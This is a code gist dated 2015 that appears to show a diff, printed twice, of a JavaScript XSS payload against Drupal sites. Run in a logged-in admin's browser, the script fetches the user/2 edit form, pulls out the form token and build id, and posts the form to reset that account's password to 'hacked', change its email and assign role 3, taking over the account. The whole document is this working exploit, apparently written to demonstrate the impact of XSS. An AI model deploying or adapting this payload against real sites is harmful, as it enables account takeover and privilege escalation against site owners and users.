greggles · December 1, 2015 20:59
diff --git a/gistfile1.js b/gistfile1.js
 // Test for  the presence of jquery.
 if (typeof jQuery == 'function') {
  // Fetch a correct token from the user edit form because we will need it to
  // successfully submit the user edit form later.
  // TODO: Include a check to increase the chance that the current user is admin,
  // which will reduce the number of access denied error messages in the log.
  jQuery.get(Drupal.settings.basePath + 'user/2/edit',
    function (data, status) {
      if (status == 'success') {
        // Extract the token and other required data
        var matches = data.match(/name="name" value="([a-zA-Z0-9]*)"/);
        var name = matches[1];
        var mail = '[email protected]';
        var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/);
        var token = matches[1];
        alert('token: ' + token);
        var matches = data.match(/name="form_build_id" value="(form-[a-zA-Z0-9_-]*)"/);
        var build_id = matches[1];
        alert('build_id: ' + build_id);
        // Post the minimum amount of fields. Other fields get their default values.
        var payload = {
          "name": name,
          "mail": mail,
          "status": 1,
          "form_id": 'user_profile_form',
          "form_token": token,
          "form_build_id" : build_id,
          "pass[pass1]": 'hacked',
          "pass[pass2]": 'hacked',
          "roles[3]": 3,
          "op" : 'save'
        };
        console.log(payload);
        var posting = jQuery.post(Drupal.settings.basePath +  'user/2/edit', payload, function(data) {
          console.log(data);
        });
        alert('done');
        }
      }
    );
 }
 else {
  alert('No jquery found? That is odd.');
 }
	// Test for the presence of jquery.
	if (typeof jQuery == 'function') {
	// Fetch a correct token from the user edit form because we will need it to
	// successfully submit the user edit form later.
	// TODO: Include a check to increase the chance that the current user is admin,
	// which will reduce the number of access denied error messages in the log.
	jQuery.get(Drupal.settings.basePath + 'user/2/edit',
	function (data, status) {
	if (status == 'success') {
	// Extract the token and other required data
	var matches = data.match(/name="name" value="([a-zA-Z0-9]*)"/);
	var name = matches[1];
	var mail = '[email protected]';
	var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/);
	var token = matches[1];
	alert('token: ' + token);
	var matches = data.match(/name="form_build_id" value="(form-[a-zA-Z0-9_-]*)"/);
	var build_id = matches[1];
	alert('build_id: ' + build_id);
	// Post the minimum amount of fields. Other fields get their default values.
	var payload = {
	"name": name,
	"mail": mail,
	"status": 1,
	"form_id": 'user_profile_form',
	"form_token": token,
	"form_build_id" : build_id,
	"pass[pass1]": 'hacked',
	"pass[pass2]": 'hacked',
	"roles[3]": 3,
	"op" : 'save'
	};
	console.log(payload);
	var posting = jQuery.post(Drupal.settings.basePath + 'user/2/edit', payload, function(data) {
	console.log(data);
	});
	alert('done');
	}
	}
	);
	}
	else {
	alert('No jquery found? That is odd.');
	}